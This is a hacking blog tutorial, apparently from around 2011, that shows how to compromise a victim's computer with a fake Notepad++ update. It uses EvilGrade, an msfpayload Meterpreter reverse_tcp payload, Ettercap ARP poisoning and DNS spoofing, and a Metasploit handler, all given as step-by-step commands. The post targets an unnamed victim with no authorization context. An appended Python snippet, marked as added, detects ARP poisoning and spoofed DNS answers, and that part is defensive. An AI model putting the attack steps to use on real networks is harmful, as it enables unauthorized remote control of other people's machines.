Freelancer developer and Hacker

Fake Updates – Back|Track 5 Hacking

Hi guys, now I’m gonna show how to hack someone’s computer by redirecting the update request to your computer using EvilGrade.

Now, after downloading EvilGrade 2.0, let’s extract it. To do that, just run this command:
tar xvfz isr-evilgrade-2.0.0.tar.gz

Note: Navigate to where you’ve downloaded the package using the cd command.

Then we need to run EvilGrade. Simply type these two commands:
cd isr-evilgrade
./evilgrade

Now we need to determine the target application, because EvilGrade will create a fake update to inject into the victim’s computer. To list all the supported applications, use
show modules
And it will print all the modules:

List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
– 63 modules available.

In this tutorial I’ve used notepad plus, so let’s configure the details to inject an update…
Let’s use the command configure [module_name], for example configure notepadplus, to set the module.
Now, before we keep setting things up, we need to get a value. Just type this command:
show options
Something like this will be printed to the console

In the image above there’s VirtualHost; that means when the victim updates their notepad plus, it will open the URL notepad-plus.sourceforge.net. Later we will use this address.
Now let’s set up the agent. I’m gonna use meterpreter/reverse_tcp instead of shell_reverse_tcp, since it allows you to do much more:
set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[1234] X > /tmp/notepadplus.exe"]'

Note: Don’t forget to remove the [] on LHOST and LPORT.

And to finish the service in EvilGrade, just type start

Do not close this window for the rest of the tutorial!


The image above shows what to edit in etter.dns.
etter.dns is located in /usr/share/ettercap/
This is how you should edit it: replace notepad-plus.sourceforge.net with the VirtualHost required by your module, and replace 192.168.1.12 with your IP.

Now start a new console and type ettercap -G
This will load ettercap in GUI mode.
Now go to “sniff” and click on “unbridged sniffing…”
Select your interface and click OK
Then go to “Plugins” and click on “Manage the Plugins…”
Double Click on dns_spoof
Now go to “Hosts” and click on “Scan for hosts”. When the scan finishes, go again to “Hosts” and click on “Hosts List”
Add your router IP to Target 1 and your victim IP to Target 2
Then go to “Mitm” and click “Arp poisoning…”
Check “Sniff remote connections.” and click OK
Now to start the DNS spoofing go to “Start” and click on “start sniffing”

Now open a new console and type these commands
cd /pentest/exploits/framework3
./msfconsole

After the console loads type
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your ip]
set LPORT [your port]
exploit

Now just wait for the victim to update the application.
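
From the defender's side, the ARP poisoning and the etter.dns entry described above both leave traces on the victim's network. The following is an added example, not part of the original post: it flags a neighbor table in which the gateway's MAC is shared with another host, and DNS answers in which a non-internal name such as notepad-plus.sourceforge.net resolves to a private address. The sample tables, MAC addresses, internal suffixes and function names are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample data (not from the original post): a neighbor table in
# `ip neigh` format and resolver answers as "hostname address" pairs.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.12 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.168.1.20 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.168.1.30 dev eth0 FAILED
"""
SAMPLE_DNS = """\
notepad-plus.sourceforge.net 192.168.1.12
www.example.org 93.184.216.34
printer.lan 192.168.1.30
"""

def hosts_sharing_gateway_mac(neigh_text, gateway_ip):
    """Return IPs whose MAC equals the gateway's MAC, a sign of ARP poisoning."""
    ips_by_mac = defaultdict(set)
    mac_by_ip = {}
    for line in neigh_text.splitlines():
        fields = line.split()
        # FAILED/INCOMPLETE entries have no lladdr field and carry no MAC.
        if "lladdr" not in fields[:-1]:
            continue
        mac = fields[fields.index("lladdr") + 1].lower()
        mac_by_ip[fields[0]] = mac
        ips_by_mac[mac].add(fields[0])
    gateway_mac = mac_by_ip.get(gateway_ip)
    if gateway_mac is None:
        return []
    return sorted(ips_by_mac[gateway_mac] - {gateway_ip})

def public_names_on_private_ips(dns_text, internal_suffixes=(".lan", ".local")):
    """Return (name, address) pairs where a non-internal name got a private IP."""
    hits = []
    for line in dns_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        name, addr = parts
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue  # skip malformed addresses
        if ip.is_private and not name.lower().rstrip(".").endswith(internal_suffixes):
            hits.append((name, addr))
    return hits
```

On the sample data the first check reports 192.168.1.12 as sharing the gateway's MAC, and the second reports the update hostname answering with that same LAN address.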


One response

  1. Does this still work on the latest version of notepad++? They are no longer hosted on sourceforge…

    December 13, 2011 at 1:32 am
